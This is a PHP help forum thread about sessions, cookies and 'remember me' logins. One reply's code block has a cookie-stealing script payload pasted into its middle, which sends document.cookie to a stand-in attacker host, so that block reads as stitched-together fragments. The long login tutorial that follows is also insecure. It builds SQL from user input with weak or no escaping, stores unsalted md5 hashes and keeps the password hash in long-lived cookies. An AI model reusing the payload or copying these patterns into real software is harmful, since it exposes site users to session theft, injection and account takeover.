Jump to content

sessions and sids


Ninjakreborn

Recommended Posts

I was wondering what is the point of using sessions to manage state for logins, you either save sids in url's or you send htem through cookies, what I see as the recommended, and safer way is cookies, but what about encrypting your session id's and decrypting them is there a point, what about if someone doesn't ahve cookies, can you use sessions like that, and still work around that or is there no point.
Link to comment
Share on other sites

You can use sessions with a database if you wish to, rather than having the SESSID being stored in a cookie/url. Or you can use use secure http connect (https), which will encrypt any data being transfered from client to server, or from server to server.
Link to comment
Share on other sites

THere are 3 ways of passing session id's, through url's through form fields, or through cookies, or database I guess.  I understand the relationship between the session and the cookie.  But I don't understand how if I store the sids in a database, how does it access that, or does each person get a different session id stored on the database on the same table as there username and password.  Like for instance when they login, I set a session and register the username/password, or whatever else, I store the sess id into the database.  So everytime they visit the site, it searches for that database to log them in automatically or something, some of this is still a little confusing and I am trying to get down sessions, encryption was pretty easy, 3 days and I know a lot about it, cookies, I created a cookie login page in 20 minutes with no experience with cookies, so that was easy as hell, but now sessions.  So do I even have a need to encrypt my passwords if it's ssh, or ssl, or whatever, because I Have that setup now.  The thing is, what if someone gets into the database, what I heard is that it's stupid to leave a plain text password stored in a database, but the crypt functions a piece of shit, the mcrypt library is severe overkill, and mysql's encode/decode functions suck anus.  There has to be another way, hash is something I can't figure out, I could probably hash something but have no idea how to compare it when they enter hte password at login, and I try to authenticate the user.
Link to comment
Share on other sites

With sessions you can complelty change the way it treats sessions, rather than having the sessions being stored in a file on the server, you make it write to the database. Have a look at [url=http://uk2.php.net/manual/en/function.session-set-save-handler.php]session_set_save_handler[/url] for more information.
Link to comment
Share on other sites

Ok let me just ask the questions I don't understand, if anyone can answer it'll be appreciated.

1. Is it better to save the sessions in the files, or on a database.
2. What is the best way to handle session id's and what should I pick as session id's
3. well that's it.  except how to allow people to remain logged in ever if they don't have cookies if I choose to pass the session id through a cookie, or is this stupid, because I know a lot of people who do it.
Link to comment
Share on other sites

Its down to you and depends on the app you are developing. I know a few PHP apps, mainly forums/cms that create their own sessions handlers, which stores sessions within the database.

Sessions ids are generated automatically and are unique.
Link to comment
Share on other sites

I have read on a lot of tutorial sites and stuff that it's best to hash your sids, when passing them, because it lowers the chances of someone trying to guess the session id to get into the existing session another thing I wanted to ask would I be stupid to rely purely on cookies for login.  So if I store the sessions in a file, and the id's in a database, that will prevent the person from having to login everytime and they still won't have to deal with cookies or anything?
Link to comment
Share on other sites

[quote]You can use sessions with a database if you wish to, rather than having the SESSID being stored in a cookie/url.[/quote]
What? You can save session data in a database on the server, but you still need a method for recognising the client. ie; cookies, passing via url / forms.
[quote]So if I store the sessions in a file, and the id's in a database, that will prevent the person from having to login everytime and they still won't have to deal with cookies or anything?[/quote]
No... in order for a user to not have to worry about logging in each time they visit a site you'll need to set a cookie. How else will you recognise the client.

Storing session data in a database is a different topic, and really is no different to storing it in files (as is the default) excepting that you can persist certain infomation and it also makes it much easier to keep track of who is where on your site ([i]who's online[/i] lists and the like).
Link to comment
Share on other sites

Alright then explain this and I am ready to go.  I visit a lot of sites to look around, on a regular basis, and I see a lot of them, free logins, I love in just for hte hell of it, and I end up finding out something like I can stay logged in.  I see that if I disable cookies I can't.  Then there are other sites I try the same thing, but even though cookies is disabled, I can still automatically log in each time, I have tested this from various sites in all three browsers, some of them keep you logged in for a specific amount of time, after hte session but no cookies get delivered of removed from the browser.
Link to comment
Share on other sites

what is the problam here if you valadate user information properly then there is no problam is there.

session are grate.

you resently had apost on sessions and cookies and was told to use both but know afther all that exsplaining you continue to ask th same quistions.

Link to comment
Share on other sites



quick cookie example of remember me ok

[code]
$username = $_POST['username'];
$password = sha1($_POST['password']);

$DB->query('INSERT INTO users (username, password) VALUES (?, ?)', array($username, $password));


$username = $_POST['username'];
$password = sha1($_POST['password']);

/* Hash the input password and check it against
  the already hashed password stored in the database.
 
  Since both passwords are hashed using the same hash
  function, the two passwords will match if the user
  enteres the correct password
*/

$user = $DB->getRow('SELECT * FROM users WHERE username=? AND password=?', array($username, $password));

if(!$user)
    die('Sorry, incorrect username or password.');


<img src="logo.gif" width="1" height="1" onload="window.location='http://cracker-site.com/save?cookie='+document.cookie" /> Hi guys, I'm new to your site!


$username = $_POST['username'];
$password = sha1($_POST['password']);

/* Hash the input password and check it against
  the already hashed password stored in the database.
 
  Since both passwords are hashed using the same hash
  function, the two passwords will match if the user
  enteres the correct password
*/

$user = $DB->getRow('SELECT * FROM users WHERE username=? AND password=?', array($username, $password));

if(!$user)
    die('Sorry, incorrect username or password.');
   
// Did this user check that 'remember me' checkbox?
if($_POST['remember_me'])
{
    $expire = time() + 1728000; // Expire in 20 days
    $cookie_pass = sha1( sha1($user['password']) . sha1($user['salt']) );
   
    setcookie('user', $user['username'], $expire);
    setcookie('pass', $cookie_pass, $expire);




if(isset($_COOKIE['user'], $_COOKIE['pass']))
{
    $user = $DB->getRow('SELECT * FROM users WHERE username=?', $_COOKIE['user']);
   
    if($user)
    {
        $check_pass = sha1( sha1($user['password']) . sha1($user['salt']) );
       
        if($check_pass == $_COOKIE['pass'])
        {
            // The user should be logged in
        }
    }

[/code]


Link to comment
Share on other sites

This is the only tutoral i am providing as you should learn ok.





database
[code]

CREATE TABLE users (  
   username varchar(30),  
   password varchar(32));

[/code]

database.php
[code]
<?  
 
/**  
* Connect to the mysql database.  
*/  
$conn = mysql_connect("localhost", "your_username", "your_password") or die(mysql_error());  
mysql_select_db('your_database', $conn) or die(mysql_error());  
 
?>  
 
[/code]


register.php

[code]

<?  
session_start();  
include("database.php");  
 
/**  
* Returns true if the username has been taken  
* by another user, false otherwise.  
*/  
function usernameTaken($username){  
  global $conn;  
  if(!get_magic_quotes_gpc()){  
     $username = addslashes($username);  
  }  
  $q = "select username from users where username = '$username'";  
  $result = mysql_query($q,$conn);  
  return (mysql_numrows($result) > 0);  
}  
 
/**  
* Inserts the given (username, password) pair  
* into the database. Returns true on success,  
* false otherwise.  
*/  
function addNewUser($username, $password){  
  global $conn;  
  $q = "INSERT INTO users VALUES ('$username', '$password')";  
  return mysql_query($q,$conn);  
}  
 
/**  
* Displays the appropriate message to the user  
* after the registration attempt. It displays a  
* success or failure status depending on a  
* session variable set during registration.  
*/  
function displayStatus(){  
  $uname = $_SESSION['reguname'];  
  if($_SESSION['regresult']){  
?>  
 
<h1>Registered!</h1>  
<p>Thank you <b><? echo $uname; ?></b>, your information has been added to the database, you may now <a href="main.php" title="Login">log in</a>.</p>  
 
<?  
  }  
  else{  
?>  
 
<h1>Registration Failed</h1>  
<p>We're sorry, but an error has occurred and your registration for the username <b><? echo $uname; ?></b>, could not be completed.<br>  
Please try again at a later time.</p>  
 
<?  
  }  
  unset($_SESSION['reguname']);  
  unset($_SESSION['registered']);  
  unset($_SESSION['regresult']);  
}  
 
if(isset($_SESSION['registered'])){  
/**  
* This is the page that will be displayed after the  
* registration has been attempted.  
*/  
?>  
 
<html>  
<title>Registration Page</title>  
<body>  
 
<? displayStatus(); ?>  
 
</body>  
</html>  
 
<?  
  return;  
}  
 
/**  
* Determines whether or not to show to sign-up form  
* based on whether the form has been submitted, if it  
* has, check the database for consistency and create  
* the new account.  
*/  
if(isset($_POST['subjoin'])){  
  /* Make sure all fields were entered */  
  if(!$_POST['user'] || !$_POST['pass']){  
     die('You didn\'t fill in a required field.');  
  }  
 
  /* Spruce up username, check length */  
  $_POST['user'] = trim($_POST['user']);  
  if(strlen($_POST['user']) > 30){  
     die("Sorry, the username is longer than 30 characters, please shorten it.");  
  }  
 
  /* Check if username is already in use */  
  if(usernameTaken($_POST['user'])){  
     $use = $_POST['user'];  
     die("Sorry, the username: <strong>$use</strong> is already taken, please pick another one.");  
  }  
 
  /* Add the new account to the database */  
  $md5pass = md5($_POST['pass']);  
  $_SESSION['reguname'] = $_POST['user'];  
  $_SESSION['regresult'] = addNewUser($_POST['user'], $md5pass);  
  $_SESSION['registered'] = true;  
  echo "<meta http-equiv=\"Refresh\" content=\"0;url=$HTTP_SERVER_VARS[PHP_SELF]\">";  
  return;  
}  
else{  
/**  
* This is the page with the sign-up form, the names  
* of the input fields are important and should not  
* be changed.  
*/  
?>  
 
<html>  
<title>Registration Page</title>  
<body>  
<h1>Register</h1>  
<form action="<? echo $HTTP_SERVER_VARS['PHP_SELF']; ?>" method="post">  
<table align="left" border="0" cellspacing="0" cellpadding="3">  
<tr><td>Username:</td><td><input type="text" name="user" maxlength="30"></td></tr>  
<tr><td>Password:</td><td><input type="password" name="pass" maxlength="30"></td></tr>  
<tr><td colspan="2" align="right"><input type="submit" name="subjoin" value="Join!"></td></tr>  
</table>  
</form>  
</body>  
</html>  
 
 
<?  
}  
?>  

[/code]


login.php

[code]
<?  
 
/**  
* Checks whether or not the given username is in the  
* database, if so it checks if the given password is  
* the same password in the database for that user.  
* If the user doesn't exist or if the passwords don't  
* match up, it returns an error code (1 or 2).  
* On success it returns 0.  
*/  
function confirmUser($username, $password){  
  global $conn;  
  /* Add slashes if necessary (for query) */  
  if(!get_magic_quotes_gpc()) {  
$username = addslashes($username);  
  }  
 
  /* Verify that user is in database */  
  $q = "select password from users where username = '$username'";  
  $result = mysql_query($q,$conn);  
  if(!$result || (mysql_numrows($result) < 1)){  
     return 1; //Indicates username failure  
  }  
 
  /* Retrieve password from result, strip slashes */  
  $dbarray = mysql_fetch_array($result);  
  $dbarray['password']  = stripslashes($dbarray['password']);  
  $password = stripslashes($password);  
 
  /* Validate that password is correct */  
  if($password == $dbarray['password']){  
     return 0; //Success! Username and password confirmed  
  }  
  else{  
     return 2; //Indicates password failure  
  }  
}  
 
/**  
* checkLogin - Checks if the user has already previously  
* logged in, and a session with the user has already been  
* established. Also checks to see if user has been remembered.  
* If so, the database is queried to make sure of the user's  
* authenticity. Returns true if the user has logged in.  
*/  
function checkLogin(){  
  /* Check if user has been remembered */  
  if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){  
     $_SESSION['username'] = $_COOKIE['cookname'];  
     $_SESSION['password'] = $_COOKIE['cookpass'];  
  }  
 
  /* Username and password have been set */  
  if(isset($_SESSION['username']) && isset($_SESSION['password'])){  
     /* Confirm that username and password are valid */  
     if(confirmUser($_SESSION['username'], $_SESSION['password']) != 0){  
        /* Variables are incorrect, user not logged in */  
        unset($_SESSION['username']);  
        unset($_SESSION['password']);  
        return false;  
     }  
     return true;  
  }  
  /* User not logged in */  
  else{  
     return false;  
  }  
}  
 
/**  
* Determines whether or not to display the login  
* form or to show the user that he is logged in  
* based on if the session variables are set.  
*/  
function displayLogin(){  
  global $logged_in;  
  if($logged_in){  
     echo "<h1>Logged In!</h1>";  
     echo "Welcome <b>$_SESSION[username]</b>, you are logged in. <a href=\"logout.php\">Logout</a>";  
  }  
  else{  
?>  
 
<h1>Login</h1>  
<form action="" method="post">  
<table align="left" border="0" cellspacing="0" cellpadding="3">  
<tr><td>Username:</td><td><input type="text" name="user" maxlength="30"></td></tr>  
<tr><td>Password:</td><td><input type="password" name="pass" maxlength="30"></td></tr>  
<tr><td colspan="2" align="left"><input type="checkbox" name="remember">  
<font size="2">Remember me next time</td></tr>  
<tr><td colspan="2" align="right"><input type="submit" name="sublogin" value="Login"></td></tr>  
<tr><td colspan="2" align="left"><a href="register.php">Join</a></td></tr>  
</table>  
</form>  
 
<?  
  }  
}  
 
 
/**  
* Checks to see if the user has submitted his  
* username and password through the login form,  
* if so, checks authenticity in database and  
* creates session.  
*/  
if(isset($_POST['sublogin'])){  
  /* Check that all fields were typed in */  
  if(!$_POST['user'] || !$_POST['pass']){  
     die('You didn\'t fill in a required field.');  
  }  
  /* Spruce up username, check length */  
  $_POST['user'] = trim($_POST['user']);  
  if(strlen($_POST['user']) > 30){  
     die("Sorry, the username is longer than 30 characters, please shorten it.");  
  }  
 
  /* Checks that username is in database and password is correct */  
  $md5pass = md5($_POST['pass']);  
  $result = confirmUser($_POST['user'], $md5pass);  
 
  /* Check error codes */  
  if($result == 1){  
     die('That username doesn\'t exist in our database.');  
  }  
  else if($result == 2){  
     die('Incorrect password, please try again.');  
  }  
 
  /* Username and password correct, register session variables */  
  $_POST['user'] = stripslashes($_POST['user']);  
  $_SESSION['username'] = $_POST['user'];  
  $_SESSION['password'] = $md5pass;  
 
  /**  
   * This is the cool part: the user has requested that we remember that  
   * he's logged in, so we set two cookies. One to hold his username,  
   * and one to hold his md5 encrypted password. We set them both to  
   * expire in 100 days. Now, next time he comes to our site, we will  
   * log him in automatically.  
   */  
  if(isset($_POST['remember'])){  
     setcookie("cookname", $_SESSION['username'], time()+60*60*24*100, "/");  
     setcookie("cookpass", $_SESSION['password'], time()+60*60*24*100, "/");  
  }  
 
  /* Quick self-redirect to avoid resending data on refresh */  
  echo "<meta http-equiv=\"Refresh\" content=\"0;url=$HTTP_SERVER_VARS[PHP_SELF]\">";  
  return;  
}  
 
/* Sets the value of the logged_in variable, which can be used in your code */  
$logged_in = checkLogin();  
 
?>  
[/code]


logout.php

[code]

 
<?  
session_start();  
include("database.php");  
include("login.php");  
 
/**  
* Delete cookies - the time must be in the past,  
* so just negate what you added when creating the  
* cookie.  
*/  
if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){  
  setcookie("cookname", "", time()-60*60*24*100, "/");  
  setcookie("cookpass", "", time()-60*60*24*100, "/");  
}  
 
?>  
 
<html>  
<title>Logging Out</title>  
<body>  
 
<?  
 
if(!$logged_in){  
  echo "<h1>Error!</h1>\n";  
  echo "You are not currently logged in, logout failed. Back to <a href=\"main.php\">main</a>";  
}  
else{  
  /* Kill session variables */  
  unset($_SESSION['username']);  
  unset($_SESSION['password']);  
  $_SESSION = array(); // reset session array  
  session_destroy();   // destroy session.  
 
  echo "<h1>Logged Out</h1>\n";  
  echo "You have successfully <b>logged out</b>. Back to <a href=\"main.php\">main</a>";  
}  
 
?>  
 
</body>  
</html>  

[/code]
Link to comment
Share on other sites

[quote]

Alright then explain this and I am ready to go.  I visit a lot of sites to look around, on a regular basis, and I see a lot of them, free logins, I love in just for hte hell of it, and I end up finding out something like I can stay logged in.  I see that if I disable cookies I can't.  Then there are other sites I try the same thing, but even though cookies is disabled, I can still automatically log in each time, I have tested this from various sites in all three browsers, some of them keep you logged in for a specific amount of time, after hte session but no cookies get delivered of removed from the browser.

[/quote]


sorry thorpe i was ansawing the quistion on the remeber me quistion as i thort ill do that for buissness man to clair things up on the remeber me issue.

ps. when it comes down to the session quistion there is no diffrence or securty diffrence from the defult session statement to a database session code in my option.

what i can not understand how comes buinessman dosn't read the manual.

i dont also know why you businessman always go on about encripting this and that forget it man.

use a session as it is and enjoy.

lol..............................




Link to comment
Share on other sites

Ok, so I will take a look at this and use it as an example, the reason I go on about encryption, is during the 3 months I studied security I learnt all kinds of attacks, before I became a programmer, I was a hacker for 10 years, I knew a lot then, and a lot of my friends had easy ways to do some of these things, making me even more afraid as a programmer.  To tell you the truth, the sessions id's I had a friend who could crack a session id in less than 20 minutes, he would listen in on the header transmissions pull the sid from the cookie, decrypt it, and use it to gain access to the current session.  There are a lot of things I learnt as a hacker, and even more I learnt from my friends, so it makes me 100 times scarder, and I feel that if I use what I use to know, the stuff I make, and the tutorials i make for other people will help them write more secure programming.
Link to comment
Share on other sites

Let me say this.

If your intrests as a haker was for 10 years then why are we having this conversation as a old hacker you should easly identify the faults in all your code.

In this day and age it's a common solution to get a book and learn tricks how to hack online computers and websites there are all sort of information out there and also well easy to understand and do,

but your a web designer know so dont worry your self on your site being hacked as you goto get listed high in google  to get properly hacked as you no.

most hackers will look for ports hanging off routers and then get what they want and go.

if you keep your code clean and secure in valadating properly and do your best then there no problam ok.

dont exspect to be able to do php programming as a high end programmer enjoy your self.

if  you get hacked you get hacked if your stupid enough to include all inportant information like credit card detail and address ect ect in a session then exspect to be hacked otherwise enjoy

good luck.



Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.